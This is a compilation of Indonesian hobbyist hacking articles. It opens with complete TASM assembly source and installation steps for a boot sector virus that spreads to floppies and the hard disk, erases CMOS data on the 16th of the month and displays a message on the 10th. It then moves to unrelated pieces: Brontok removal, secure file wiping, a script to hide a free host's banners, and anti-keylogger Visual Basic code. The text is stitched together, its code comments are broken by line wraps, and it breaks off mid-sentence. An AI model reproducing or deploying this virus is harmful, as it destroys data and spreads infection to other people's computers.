Virus Boot sector tentunya sudah lama kita ketahui, tapi bagaimana cara
membuatnya ? kali ini akan kita coba pembuatan virus yang akan akan
menghapus isi CMOS setiap tanggal 16 dan menampilkan pesan pada tanggal 10.
Pembuatannya cukup mudah, anda hanya memerlukan text editor seperti edit atau
notepad kemudian turbo assembler untuk melakukan kompilasi menjadi bentuk
executable.
CARA INSTALL
1. Compile dengan Turbo Assembler sbb:
TASM CMOSVIR
Hasil Dari compile harus berjumlah 1024 KB, kalau tidak saya yg salah
2. Format disket 1,2KB/1,44KB dengan option /S
Copy file DEBUG.COM dan CMOSVIR.EXE ke disket tsb. Masukkan Disket 1,2KB/1,44KB
tsb di drive A:
3. Masuk ke BIOS kemudian set semua HDD BIOS anda ke None
Boot Komputer Kamu dengan disket 1,2KB/1,44KB Tersebut.
4. Tulis Boot Sector asli ke Track 0, Side 1, Sector E
A:\>DEBUG Enter
-L 100 0 0 1 Enter
-W 100 0 1C 1 Enter
-Q
6. Sekarang disket Kamu sudah berisi virus, cukup dengan virus Warm Boot
maka Virus akan masuk ke memory dan menginfeksi apa saja yang dia mau ...
KETERANGAN Dari Program Ini Dan Resiko nya
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: 1 : Melakukan Proses Boot dan meresidenkan ( Hati - Hati ) ::
:: 2 : Melakukan Proses penularan ke hard disk ( akhir boot) ::
:: 3 : Melakukan Proses penularan ke disket (setelah residen) ::
:: ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Anda Siap Dengan Segala Resiko nya ? Anda Siap Ok ?. Mari kita mulai
seg_a segment
assume cs:seg_a,ds:seg_a
;(1) AWAL PROGRAM SAAT BOOT
jmp residen
; BAGIAN DATA VIRUS
nop
off_int13
db 59h,0ECh
seg_int13
db 02,0C6h
off_int13_baru db 0F5h,00
seg_int13_baru db 80h,9Fh
kode_sector db 03,00
;(3) AWAL Dari PROGRAM RESIDENT
vect13:
push ax
push ds
;(3) APAKAH DRIVE A?
or dl,dl
; apakah DL=0 ?
jnz bukan_A ; jika
tidak loncat ke bukan_A
;(3) APAKAH MOTOR DRIVE BERHENTI?
xor ax,ax
; AX=0
mov ds,ax
; set DS=0
test byte ptr ds:[43Fh],1 ; motor off ?
jnz bukan_A
; jika tidak loncat ke bukan_A
;(3) PENUTUP BAGIAN RESIDENT
pop ds
pop ax
pushf ; Push
flags
call dword ptr cs:off_int13 ;
jalankan int 13 asli
pushf ; Push
flags
call subrutin ;
jalankan program virus
popf
; Pop
flags
retf 2
; Return far
;(3) JIKA BUKAN DRIVE A ATAU MOTOR TIDAK OFF
bukan_A:
pop ds
pop ax
jmp dword ptr cs:off_int13
; loncat ke int 13 asli
;(3) AWAL BAGIAN 3 (BAGIAN RESIDENT)
subrutin proc near
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
push cs ; set
DS=CS
pop ds
push cs ; set
ES=CS
pop es
;(3) MEMBACA BOOT SECTOR DI DRIVE A: LETAKKAN DI OFFSET 200 (UNTUK MELAKUKAN
PENULARAN)
; DIULANG JIKA GAGAL BACA DISK
mov si,3
; untuk counter 3x
bacaboot_A:
mov ax,201h
; baca 1 sector
mov bx,200h
; ke offset 200
mov cx,1
; track 0, sector 1
xor dx,dx
; head/side 0, drive 0/A:
pushf
; Push
flags
call dword ptr ds:off_int13 ;
int 13 asli
jnc cek_A
; jika sukses loncat ke cek_A
xor ax,ax
; AH=0/reset disk
pushf
; Push
flags
call dword ptr ds:off_int13 ;
int 13 asli
dec si
; SI dikurangi 1
jnz bacaboot_A ;
jika SI tidak nol loncat ke bacaboot_A
jmp short selesai ; jika 3x
gagal baca loncat ke selesai
;(3) PEMERIKSAAN APAKAH ADA VIRUS DI A:
cek_A:
xor si,si
; SI=0
cld
; arah load positif
lodsw
; String [si] di load ke ax
cmp ax,[bx]
; bandingkan ax dgn yg ditunjuk BX
jne tulari_disk ; jika tidak sama
loncat ke tulari_disk
lodsw
; String [si] di load ke ax
cmp ax,[bx+2] ; bandingkan ax
dgn yg ditunjuk bx
jz selesai
; jika sama loncat ke selesai
;(3) Infeksi/Penularan, JIKA TIDAK ADA VIRUS DI DISKET
; TULIS BOOT SECTOR INI KE TRACK 0, HEAD 1 SECTOR 3 (DISKET DD)
; SECTOR E (DISKET HD)
tulari_disk:
mov ax,301h ; tulis 1 sector
mov dh,1
; ke head/side 1
mov cl,3
; sector 3
cmp byte ptr [bx+15h],0FDh
; apakah disket DD (360KB)?
je tulis_disk
; jika ya loncat ke tulis_disk
mov cl,0Eh
; sector E (disket HD)
tulis_disk:
mov word ptr ds:kode_sector,cx ;
simpan kode disk di offset 8
pushf ; Push
flags
call dword ptr ds:off_int13 ; int
13 asli
jc selesai
; jika gagal tulis loncat ke selesai
;(3) COPY SEBAGIAN BOOT ASLI KE BOOT VIRUS
copy_boot:
mov si,200h+offset sisa
; dari boot asli
mov di,offset sisa
; ke boot virus
mov cx,39h
; sebesar 39h
cld
; Clear direction
rep movsw
; Ulang selama cx>0 salin isi offset 3F2h ke offset 1BEh
;(3) TULIS BOOT VIRUS KE TRACK 0, HEAD 0, SECTOR 1
mov ax,301h
; tulis 1 sector
xor bx,bx
; dari offset 0
mov cx,1
; ke track 0, sector 1
xor dx,dx
; head/side 0, drive 0 / A:
pushf
; Push flags
call dword ptr ds:off_int13
; int 13 asli
selesai:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
retn
subrutin endp
;(1) AWAL BAGIAN I (ME-RESIDENT-KAN)
residen:
xor ax,ax
; AX=0
mov ds,ax
; set DS=0
cli
; Disable interrupts
mov ss,ax
; set SS=0
mov ax,7C00h ; AX=7C00
mov sp,ax
; set SP=7C00 (offset boot)
sti
; Enable interrupts
push ds
; simpan 0000:7C00 di stack
push ax
; utk boot normal (retf)
;(1) SIMPAN VECTOR INT 13 ASLI KE OFFSET 7C03 DAN 7C05
mov ax,word ptr ds:[4Ch]
; offset vector int 13
mov word ptr
ds:[7C00h][off_int13],ax
; simpan di offset 7C03
mov ax,word ptr ds:[4Eh]
; segment vector int 13
mov word ptr
ds:[7C00h][seg_int13],ax
; simpan di offset 7C05
;(1) KURANGI BASE MEMORI 2 KB
mov ax,word ptr ds:[413h] ; Base Memory
dec ax
; kurangi 1KB
dec ax
; kurangi 1KB
mov word ptr ds:[413h],ax ; simpan kembali
;(1) SET VECTOR INT 13 KE 9F80:000E (OFFSET VIRUS)
mov cl,6
; counter
shl ax,cl
; digeser kekiri 6 bit
mov es,ax
; ES=9F80
mov word ptr
ds:[7C00h][seg_int13_baru],ax
; catat di offset 7C0C
mov ax,offset vect13
; set vector int 13
mov word ptr ds:[4Ch],ax
; offset = vect13 = E
mov word ptr ds:[4Eh],es
; segment 9F80
;(1) COPY 0000:7C00 KE 9F80:0000, PROSES ME-RESIDENT-KAN
mov cx,offset sisa
; sebanyak 1F2h (484 byte)
mov si,7C00h
; offset 7C00
xor di,di
; offset 0000
cld
; Clear direction
rep movsb
; Ulang selama cx>0 salin isi 0000:7C00 ke 9F80:0000
;(1) MENGAKHIRI BAGIAN 1
; EKSEKUSI PINDAH KE ALAMAT PADA OFFSET 7C00 +off_int13_baru
; YAITU SEGMENT-VIRUS (9F80):OFFSET-BAGIAN 2 (00F5)
jmp dword ptr
cs:[7C00h][off_int13_baru]
; 9F80:00F5
;(2) BAGIAN 2 (PENULARAN SAAT BOOT)
; DI EKSEKUSI DARI SEGMENT VIRUS (9F80)
xor ax,ax
; AX=0
mov es,ax
; ES=0
int 13h
; reset disk
push cs
; set DS=CS=9F80
pop ds
;(2) MEMBACA BOOT/PARTISI ASLI, KITA LETAKKAN KE 0000:7C00
; UNTUK MEMLAKUKAN BOOT NORMAL
mov ax,201h
; baca 1 sector
mov bx,7C00h ; ke offset
7C00
mov cx,word ptr ds:kode_sector
; ambil kode disk
cmp cx,7
; bandingkan dgn 7 (harddisk)
jnz bootdisk
; jika bukan boot dari disk
baca_C:
mov dx,80h
; head/side 0, drive C
int 13h
; baca sector ke memory es:bx
jmp cektgl
; ke cektgl
;(2) MELAKUKAN PROSES BOOT DARI DISKET
bootdisk:
mov cx,word ptr ds:kode_sector
; ambil kode disk
mov dx,100h
; head/side 1, drive 0/A:
int 13h
; baca sector ke memory es:bx
jc cektgl
; jika gagal baca, ke cektgl
;(2) MEMBACA PARTISI HARD DISK, LETAKKAN KE 9F80:0200
push cs
pop es
mov ax,201h
; baca 1 sector
mov bx,200h
; ke offset 200
mov cx,1
; track 0, sector 1
mov dx,80h
; head 0, drive C
int 13h
; baca sector ke memory es:bx
jc cektgl
; jika gagal, cek tanggal
;(2) PERIKSA APAKAH ADA VIRUS DI HD, JIKA TIDAK, Mari kita TULARI
xor si,si
; SI=0
cld
; Clear direction
lodsw
; isi yg ditunjuk [si] salin ke ax
cmp ax,[bx]
; bandingkan ax dgn alamat yg ditunjuk bx
jne tulpart
; jika tidak ada CMOS Scanner
lodsw
; isi yg ditunjuk [si] salin ke ax
cmp ax,[bx+2]
; bandingkan ax dgn alamat yg ditunjuk bx+2
jne tulpart
; jika tidak ada CMOS Scanner
;(2) MEMRIKSA/CEK TANGGAL
cektgl:
xor cx,cx
mov ah,04
; baca tanggal
int 1Ah
cmp dl,010h
; tanggal 10?
je pesan
cmos:
cmp dl,016h
; tanggal 16?
jne boot
mov byte ptr ds:counter,00h
uling:
mov al,ds:counter
out 70h,al
mov al,00h
out 71h,al
inc byte ptr ds:counter
cmp byte ptr ds:counter,0FFh
jne uling
boot:
retf
; Return far (jmp ke isi stack)
;(2) TAMPILKAN PESAN
pesan:
mov si,offset Data
lanjut:
push cs
pop ds
ulang:
lodsb
sub al,41h
cmp al,9h
; al =9h ?
jz boot
; jika sama boot
mov ah,0Eh
mov bh,0
int 10h
; Video display ah=functn 0Eh
; write char al, teletype mode
jmp short ulang ; ulangi pesan
;(2) MELAKUKAN PENULARAN KE HARD DISK, TULIS PARTISI ASLI KE TRACK 0, HEAD 0,
SECTOR 7
tulpart:
mov cx,0007
; track 0, sector 7
mov word ptr ds:kode_sector,cx
; simpan kode disk
mov ax,0301
; tulis 1 sector
mov dx,0080
; head 0, drive C
int 13h ;
tulis
jb cektgl
; jika gagal, cektgl
;(2) MARI KITA COPY BAGIAN BELAKANG PARTISI ASLI KE PARTISI VIRUS
copy_part:
mov si,200h+offset sisa
; dari boot asli
mov di,offset sisa
; ke boot virus
mov cx,39h
; sebanyak 32h byte
rep movsw
; Ulang selama cx>0 salin [si] ke es:[di]
;(2) MENULIS BOOT VIRUS KE PARTISI HARD DISK
mov ax,301h
; tulis 1 sector
xor bx,bx
; dari offset 0000 (partisi virus)
inc cl
int 13h
jmp cektgl
Data
db 84h,8Eh,90h,94h,61h
db 94h,0A4h,0A2h,0AFh,0AFh,0A6h,0B3h,61h
db 69h,48h,0A4h,48h,6Ah,48h,61h
db 84h,0BAh,0A3h,0A6h,0B3h
db 83h,0B6h,0A8h,61h,61h
db 4Bh,4Eh,4Bh,4Ah ; LF CR
Counter db 0h
Sisa db 57 dup (0)
; tempat data atau sisa boot/partisi
seg_a ends
end
Settingan Disable Active-scripting Bikin Ngadat Yahoo!Mail
Artikel ini pada dasarnya merupakan Respons dari masukan2/ komentar2 terhadap
artikel yang saya tulis terdahulu di jasakom yang berjudul “Cara nge-Hack
Artikel yang Diproteksi di jkt1.detiknews.com”. http://www.jasakom.com/article.aspx?ID=689
Penulis menyadari, dalam mengaplikasikan variasi trik2 hacking tentunya selalu
ada plus-minusnya.
Beragam komentar/masukan yang disampaikan para Komentator, mulai dari komentar
yang KONSTRUKTIF, komentar yang datar2 saja tapi PRODUKTIF, hingga komentar
yang AsBun, menyerang, merendahkan dan terkesan PRIMITIF. Dan fenomena ini hampir
terjadi kepada semua penulis/tutor yang telah dengan susah payah menuangkan
segala pikirannya ke dalam sebuah artikel/tutorial.
But it’s ok. YUK semua ini qta jadikan sebagai bagian dari proses pembelajaran
bagi saya, para penulis, dan qta smua.
Dari sekian banyak saran yang masuk, penulis tertarik untuk mengupas pengalaman
setelah mengadopsi cara me-disable-kan Active-scripting. Cara ini diakui lebih
instan, namun di pihak lain agak riskan dan mengganngu.
Akhir-akhir ini banyak WEB yang menggunakan JavaScript (JS), atau WEB yang
berbasis JavaScript, sehingga mau tidak mau apabila qta melakukan perubahan
settingan tersebut maka akan berdampak terhadap proses browsing yang Tidak-Bisa
di lanjutkan terutama bagi Halaman e-mail yang berbasis ‘JS’, seperti
Yahoo!Mail, GoogleMail, etc.
Note: Untuk melihat pengarahuh nyatanya, Anda harus SignIn dulu ke dalam imel-nya
dan buka salah satu button-nya; Inbox, sent, bulk, etc.
APA PengaruhnYa ?
AKIBAT perubahan seting ini, Yahoo!Mail misalnya, menganggap bahwa mesin Browser
yang qta pake terlalu kuno dan tidak mendukung JavaScript, sehingga disarankan
untuk meng-upgrade ke versi yang lebih baru. ATAU Jika JavaScript didisfungsikan
dalam browser, Anda harus memfungsikannya supaya dapat melanjutkan.
KONGKRIT-nya:
(1)Bagi anda yang familiar dengan ‘JS’ mungkin akan dengan mudah
menangani permasalan ini. TAPI bagi yang aWaM, mereka akan percaya saja, shg
menginstal ulang mesin browsernya, padahal IE yg dia miliki sudah versi terbaru.
(2)Trik ini sifatnya trade-off artinya qta tdk bisa memberlakukan secara paralel,
Jadi harus Memilih. Mau ngImel ato ‘bongkar’ artikel yang terproteksi?!.
>> Mungkin dlm kasus artikel ini, saya percaya, dari teman2 ‘jsCom’
ada cara lain yang bisa ato pernah berhasil memparalelkan ke-2nya. Nah ekspektasi
inilah yang belum tergali oleh penulis.
PENANGANANnya (Khusus untuk yang AwAm):
Setiap Versi Tentunya Berbeda Untuk memfungsikan JavaScript:
Internet Explorer 5 atau lebih baru:
1. Klik Tools, kemudian klik Internet Options.
2. Klik tab Security
3. Klik tombol Custom Level.
4. Gulir ke bagian Scripting
5. Centang Enable di bawah Active scripting, Allow paste operations via script,
dan Scripting of Java applets.
6. Klik tombol OK.
Internet Explorer 4.x:
1. Klik View
2. Klik Internet Options.
3. Klik tab Security
4. Klik tombol Settings
5. Gulir ke bagian Scripting
6. Centang Scripting of Java applets dan Active Scripting.
7. Klik tombol OK.
Netscape 6.x:
1. Klik Edit, kemudian klik Preferences
2. Klik Advanced.
3. Centang Enable JavaScript for Navigator.
4. Klik tombol OK.
Mesin Browser Lain (Biasanya Sich):
1. Klik Tools
2. Klik Internet Options.
3. Idem dengan IE 4 atau IE 5
The Pattarosanz kin-toon to kangtatantakwa@yahoo.co.id
Mungkin teman-teman pernah kesal dengan kelakuan virus Brontok...
Mungkin teman-teman sudah bosan menggunakan segala jenis antivirus...
Tanpa perlu basa-basi lagi...
Di bawah ini saya akan menjelaskan secara singkat cara menghilangkan virus
Brontok..
1. Cari program WinTask Pro Trial (Kalo ada cracknya lebih bagus lagi...), bisa
di search di google.com 2. Jalankan program WinTask 3. Matikan semua proses yang
berasal dari C:\Documents and Settings\& user &\Application Data\...
3. Lakukan Searching pada My Computer dengan nama file *.exe (jangan lupa
aktifkan More Advance Option : Search System Folder, Search Hidden File and
Folders, Search SubFolders. Klik Search...
4. Setelah proses Searching selesai, hapus semua file yang memiliki icon
berbentuk folder (berwarna kuning). Sampai di sini tugas anda hampir selesai...
5. Masuk ke regedit (saya menggunakan TuneUp Registry Editor > juga dari
Google.com)
6. Lakukan pencarian string NoFolderOption, ubah nilainya menjadi 0.
7. Restart Windows Explorer...
8. Buka Windows Explorer, pilih: Tools > Folder Option dan masuk ke tab View
lalu aktifkan Show Hidden Files and Folders...
5. Masuk ke setiap Folder User : C:\Documents and Settings\& User &\Start
Menu\Programs\Startup dan hapus file "Start" yang memiliki icon seperti Dos (Cmd).
6. Anda terbebas dari Brontok, tapi, registry editing belum bisa diaktifkan...
Aktifkan melalui TuneUp Registry Editor... (Bisa dicoba sendiri, buat belajar...!)
Thansk 4 anak2 Soetra Community @ defacer.net Wish u were here >
Adhelina....
Artikel ini kangtatantakwa tulis khususnya untuk menjadi masukan bagi keamanan
dan kerahasiaan file-file (softcopy) pemerintah, dunia bisnis, dan lembaga edukasi.
Dalam hal ini data-data yang masih dianggap rahasia tetapi secara relatif tidak
begitu penting lagi. Sehingga harus dilakukan penghapusan bahkan penghancuran
file tersebut yang orang lain tidak boleh mengetahuinya.
Masih ingat dengan artikel kangtatantakwa tentang System Mechanic Pro-5 yang
dimuat di Jasakom 24/09/2005 (http://www.jasakom.com/article.aspx?ID=710), sekedar
mengingatkan dan/atau bagi anda yang belum membaca artikel tersebut dapat juga
mengunjungi http://www.geocities.com/kangtatantakwa lihat Kolom Artikel : Cracking.SysMech5.Pro.
Pada kesempatan ini kangtatantakwa bukan mau ber-Crack mania seperti artikel
terdahulu, tetapi akan memberitahukan rahasia penggunaan tool-tool yang ada
dalam paket program (software) system mechanic tersebut. Dalam hal ini adalah
INCINERATOR. Klaim Produsen (IOLO) : tool ini dipakai (menjadi standar keamanan
penghapusan data) oleh dinas keamanan dan Departemen Pertahanan USA sebagai
alat untuk menghapus atau menghancurkan file-file penting (top secret), dengan
tingkat penghapusan JEJAK (Trace) yang tinggi.
Lantas apa bedanya dengan RecycleBin yang ada dalam desktop windows ?.
Benar, secara fisik baik RecycleBin dan Incinerator adalah sebagai penghapus
data atau file. Akan tetapi incinerator memiliki keunggulan yang tidak dimiliki
oleh RecycleBin. Seperti yang disebutkan di atas, incinerator memiliki tingkat
penghapusan yang tinggi. Artinya begitu kita menghapus data atau file dengan
incinerator, maka jangan harap orang lain bisa/mampu meRecover atau meRestore
file-file yang telah kita hapus, termasuk kita sendiri.
Jadi pikirlah matang-matang sebelum anda benar-benar untuk memutuskan menghapus
data dengan program incinerator. Program ini tidak melengkapi dirinya dengan
file *.bak (backup), sehingga yang terlanjur mengeksekusi tidak memungkinkan
lagi untuk meng-Undo.
Bisa kangtatantakwa laporkan. Sesuai uji coba (oprekan) yang telah kangtatantakwa
lakukan untuk meRecover dan meRestore file-file tersebut, yaitu menggunakan
sistem restore yang terdapat pada windows (default) juga dengan menggunakan
software yang memiliki utilitas untuk meRecover dan meRestore seperti : Undelete
Deluxe, TuneUp Utilities 2005, RecoverDelete Data, etc. DAN hasilnya NIHIL alias
kangtatantakwa Kehilangan Jejak (China : kangtatantakwa Ling Lung).
Baiklah, sebelum kita praktek pastikan anda sudah menginstall program System
Mechanic tersebut. Bagi yang belum silahkan masuk ke http://www.jasakom.com/article.aspx?ID=710
atau http://www.geocities.com/kangtatantakwa disana anda program trialnya yang
dapat anda download.
PERLU anda ingat, dalam menghapus data atau file secara teknis hampir sama
dengan ketika anda menghapus file ke RycleBin, hanya pada kasus ini anda mengarahkannya
(target) ke icon Incinerator.
Bagi anda yang ingin membakar file yang sangat besar misalnya di atas 100 MB,
sebaiknya di-zip/kompres terlebih dahulu. Sebab bila “terurai” proses
transfer data dari forder ke incinerator akan membutuhkan waktu yang lama, karena
sistem harus men-trace informasi satu-persatu. Dan tidak hanya itu, pada waktu
pembakaran (destroyed) juga membutuhkan waktu yang lama.
Pastikan pada saat proses pembakaran (incinerating) share memori untuk program
incinerator proporsinya harus mencukupi, bila tidak prosesnya akan lambat dan
bahkan bisa “hang”. Disarankan pada saat proses incinerating jangan
anda aplikasi program lain yang aktif. Hal ini dimaksudkan agar share memori
lebih stabil.
Yuup!, kangtatantakwa anggap semua sudah menginstall dan siap mengikuti praktek.
Setelah anda menginstall program utama, kini kita tinggal menSetting (aktivasi)
tool yang dimaksud. Langkah-langkah yang perlu anda ikuti sebagai berikut :
1. Open (baca: klik dua kali) icon program system mechanic-nya.
2. Sorot bar/button “PROTECT” dan klik Securely Delete File.
3. Klik button “Install Incirenator”. Tunggu sejenak sampai proses
selesai, Klik Exit.
4. Hapus File apa saja yang akan anda bakar, dengan cara drag-and-drop ke icon
Incinerator, atau dengan mengklik kanan dan pilih send to Incinerator.
5. Cara Membakar. Pada dekstop klik kanan icon Incinertor-nya kemudian sorot
dan klik Incinerate all.
6. Proses Pembakar file atau data.
7. Selesai.
..::AgreeMent::..
Semua yang anda pelajari dan yang anda lakukan secara otomatis sudah menjadi
TANGGUNG JAWAB anda Sepenuhnya, Seluruhnya, dan Seutuhnya.
..::gReetz::..
.oo.Terimakasih buat Jasakom yang selalu mempublish artikel kangtatantakwa.
.oo.Terimakasih untuk Iolo Producer yang menyajikan tool-tool yang bagus. Terus
berinovasi -&- berkreasi dan jangan kapok untuk diCrack oleh kangtatantakwa,
hehehe...
.oo.Terimakasih untuk semua yang tergabung di komunitas Jasakom yang telah menyempatkan
membaca artikel kangtatantakwa baik di jasakom.com maupun di geocities.com/kangtatantakwa.
The Pattarosanz kin-toon to kangtatantakwa@yahoo.co.id
Mungkin sudah banyak para programmer/webmaster PHP yang sudah mendaftar Hosting
gratis di 100webspace.com
Memang TOP BGT fasilitas, servis dan pelayanan Hosting di sana. Setidaknya untuk
kelas Hosting gratisan.
Selain PHP ama MySQL DB, ada Hosted Domain, Domain Manager, Mail Manager, Statistic
dll.
Pokoknya buanyak kalo pengen lebih jelasnya (sekalian daftar) lihat di http://www.100webspace.com/signup.html
Namun agak menjengkelkan bila website yang kita upload ke hosting tsb. tiba2
berbanner, akhirnya layout website
yang dah kita rancang dengan rapi menjadi tampak kurang sedap dipandang, atau
jadi terkesan tidak profesional,
karena ketambahan banner di atas tiap halamannya.
Kali ini saya ingin membagi salah satu trik mengakali banner tersebut.
Caranya cukup simple, tinggal masukkan script berikut di bawah ini ke setiap
halaman website yang anda buat.
-------------- cut here --------------
<script> /* function LaHap_BaNNeR(OpoAe as Object) // This BaJiLah scripting is one of "n" methods on HIDing the phucked BANNER from: // http://www.100webspace.com/signup.html (freeprohost, goldeye, freeunixhost, etc.) // // USAGE: just put this script at the TOP of your each pages on the Hosting. // NiCK_n4m3 = "UNiQUE aka BNM"; R34L_n4m3 = "B***s N*r M*h*mm*d"; ReALm = "Nuker de UNiX un WinDowZ BoxEs"; NaTiVE = "C,BAS,PAS,PHP,JAVA"; */ google_ads = "UNiQUE's Shoutz: Amin!! Alloohumma Sholli Wasallim Wa Baarik 'Alaih..."; /*
if (!banner.ilang) { Minggato_BANNER(True); Clean_Up_Pages(this.fucked.page.berbanner); document.write "Terima kasih kepada Pihak Hosting ! :)"; */{ } </script><noscript><body></noscript>
-------------- /cut here --------------
Contoh penggunaan: Misalnya isi salah satu halaman web anda sbb:
-----------.. cut here ----------- <script> /* function LaHap_BaNNeR(OpoAe as Object) // This BaJiLah scripting is one of "n" methods on HIDing the phucked BANER from: // http://www.100webspace.com/signup.html (freeprohost, goldeye, freeunixhost, etc.) // // USAGE: just put this script at the TOP of your each pages on the Hosting. // NiCK_n4m3 = "UNiQUE aka BNM"; R34L_n4m3 = "B***s N*r M*h*mm*d"; ReALm = "Nuker de UNiX un WinDowZ BoxEs"; NaTiVE = "C,BAS,PAS,PHP,JAVA"; */ google_ads = "UNiQUE's Shoutz: Shollaloohu 'Alaa Muhammad!! Alloohumma Sholli Wasallim Wa Baarik 'Alaih..."; /*
if (!banner.ilang) { Minggato_BANNER(True); Clean_Up_Pages(this.fucked.page.berbanner); document.write "Terima kasih kepada Pihak Hosting yang ikhlas memberikan sgl serpisnyah! :)"; */{ }
Coba Upload kembali halaman web yang sudah ditambahi script.
Selama Javascript Browser di-Enable, Banner ga kan muncul lagi.DEMO bisa dilihat
di http://unique.freeunixhost.com , view source!
Kalo Anda sedikit saja mengerti js, pasti bisa langsung mengerti bagian script
mana yang bullshit alias dummy,
Kalo dirasa ga perlu, del aja!!
Last, Masih ada banyak metode buat ngakalin banner tsb, ini hanya salah satu
dari "n" cara yang ada.
Moga berguna...
Special Greetz to:
1. Team Project 'Single Database NAsional' Dikmenjur 2005. (/me,edui,kanataksp17,der^tyo,boz
ADITCH+ADI)
2. All my Friends (nearby or far apart, we're prendz poreper! love you alwayz!
:P)
3. My family @ Lumbangrejo, etc.
Membuat Aplikasi Terhindar Dari Pemantauan Keylogger (Visual Basic)
Hai... ketemu lagi dengan Tomero :), udah lama aku nggak nongol.
Maklum, lg banyak kesibukan nih. Hiks, sampai-sampai situs aja
dicuekin.
Tapi, aku rindu
bangat lho sama temen-temen hueheueheueheue... makanya aku buru-buru buat
artikel walaupun sederhana yg penting bisa ktemu temen-temen. Cikuk..cikuk...
ihi..ihi..ihik.. >(:o)
Oh iya, kembali jadi ngawur nih... kembali yah ke topik. Gini, semua orang
apalagi yg udah kenyang yg namanya internet pasti deh dah kenal yg namanya "keylogger".
Bahkan, sudah banyak buku-buku tentang sekuriti komputer yg membahas tentang
teknologi yg satu ini. Tapi jarang sekali ada yg mengulas bagaimana cara untuk
mencegah agar orang yg menggunakan aplikasi yg kita buat terbebas dari ancaman
mata-mata keylogger. Kebanyakan hanya mengulas bagaimana membersihkan software
keylogger yg ada dikomputer, yang sudah tentu perlu meng-update layaknya
anti-virus setiap kali ada keylogger baru. Belum lagi k'lo keyloggernya berbasis
hardware, wah lain lagi deh ceritanya.
Semua keylogger baik yg dlm bentuk hardware, memiliki tujuan utama yg sama
yaitu memantau semua data yg diketikkan oleh user. Jadi, semua data yg
diinputkan/ketikkan ke suatu aplikasi akan dipantau dan disimpan untuk digunakan
oleh pihak yang menanam keylogger tsb. Pada kesempatan ini, seperti yang aku
katakan sebelumnya. Aku memberikan contoh bagaimana mengamankan user agar aman
menggunakan aplikasi yg kita buat. Apalagi dalam hal sekuriti misalkan
penginputan password. Untuk itu, jangan pernah berfikir aku akan membuat mesin
scanning keylogger seperti layaknya anti-virus.
Contoh program dibuat disini adalah contoh sederhana. Aku menggunakan bahasa
pemrograman Visual Basic. Yang mudah dimengerti namun, sangking mudahnya sampai
saat ini nggak ada juga yang bisa buat aplikasi yang canggih lewat VB ini...
hiks... Semua berkutat pada bahasa yg jauh lebih sulit, nyatanya outputnya jauh
lebih bagus bila dibuat dng VB (karena mudah kali yah ). Bagi aku masalah mudah
atau nggak tergantung keluarannya apa. Buat apa si marnok jauh-jauh belajar ke
Amerika... eh, si otong lulusan dalam negeri jauh lebih pinter dari marnok...
Baiklah kita langsung ke pembuatannya yah...
1. Buka Designer Visual Basic kamu (aku pake v.6)
2. Tambahkan sebuah kontrol TextBox, lalu beri nilai properti "Name" menjadi
"txtPassword"
3. Masuk ke jendela form code, isikan source code berikut:
'<- START CODE ->'
'*********************************************
'CONTOH ANTI KEYLOGGER PADA VISUAL BASIC'
'**********************************************
'UNTUK PENJELASAN MENGENAI FUNGSI API, CARI AJA DIINTERNET :)
Private Declare Function VkKeyScan Lib "user32" Alias "VkKeyScanA" (ByVal cChar
As Byte) As Integer
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Integer, ByVal bScan
As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
'Fungsi Untuk Menciptakan Nilai Random Dari Interval Tertentu....
Function RandomNumber(ByVal LowerBound As Single, ByVal UpperBound As Single) As
Single
Randomize Timer
RandomNumber = (UpperBound - LowerBound) * Rnd + LowerBound
End Function
Private Sub txtPassword_Change()
TxtPassword.Locked = True '<== Sengaja Biar Nggak Banyak Makan Resource
Dim LoopC As Byte, i As Byte
LoopC = RandomNumber(3, 254) 'Ciptakan Nilai Random Mulai 3 - 254
i = 0
'Banyak Pengiriman Event Keyboard Random Setiap Kali Ketik...
Do While LoopC > i
'Kirim Event Keyboard Secara Random Biar Mengacaukan Nilai Yang Ditangkap
Keylogger
Call keybd_event(VkKeyScan(RandomNumber(32, 126)), 0, 0, 0)
i = i + 1
Loop
DoEvents 'Kasih kesempatan program lain bekerja :)
TxtPassword.Locked = False
End Sub
'<- END CODE ->'
Jalankan... kamu akan melihat tampilannya sbb:
Gbr. 1. Aplikasi Anti Pemantauan Keylogger
Silahkan melakukan percobaan dng keylogger. Oh, iya aku mendownload dari
salah satu situs contoh keylogger sederhana yang bisa kamu download juga
bersama-sama semua yang menyangkut artikel ini. Contoh output yg dihasilkan
adalah :
Gbr. 2. Aplikasi Keylogger dengan hasil pantauannya.
Dari sini kamu dapat melihat, pada aplikasi buatan kita (gbr. 1) aku
menginput hanya 3 karakter saja. Namun, anehnya si keylogger (gbr. 2) memberi
hasil pantauan yg lebih dar 3 karakter. Nah, aku rasa kamu sudah ngerti kali
algoritma dari source code diatas. Yup!! Tepat sekali, sebenarnya bukan si
keyloggernya yg salah tapi memang kita sengaja mengakali agar keylogger
menangkap event keyboard yg sebenarnya tidak kita buat tapi dilakukan oleh
program dan event keyboard ini tidak dikeluarkan pada posisi blink text
melainkan di memory yang akan dimanfaatkan program yang menggunakannya dalam
kasus ini keylogger tsb, artinya dia terjebak!!!.... hmmm bingung yah...
Begini, misalkan passwordku adalah "IDA", dan akan kuisi ke form input
aplikasi (gbr. 1). Pertama-tama saat aku menekan huruf "I" pada keyboard.
keylogger akan menerima output huruf yang kita ketik ditambah huruf ketikan yg
dikirim oleh program yg kita buat dng bentuk dan jumlah yg acak (random). Begitu
pula saat aku ketik huruf berikutnya yaitu "D", dan seterusnya. Lihat rumus
berikut :
Output Keylogger = (Satu Karakter yg diketik) + (Karakter yang diciptakan
program aplikasi secara acak X Nilai Acak)
X = Dikali / Sebanyak
Kalo dah begini... Pastinya, si penanam keylogger akan kebingungan melihat
hasil pantauan yg diberikan keylogger. huehueheueheue.. biar kapok tuh para
orang iseng yg memanfaatkan keylogger tuk curi-curi hak orang.... wueeekkk...
Akhir kata mungkin artikel ini belum cukup juga menjelaskan tentang keamanan
yg menyangkut keylogger ini. Yah, saran aku sih belajar-belajarlah. Soalnya k'lo
cuma dibaca doang, trus nggak dikembangin wah... sama aja aku ngasih biji tapi
kamu letakin di tanah yg kering. Percuma khan... Aku pengen temen-temen pada
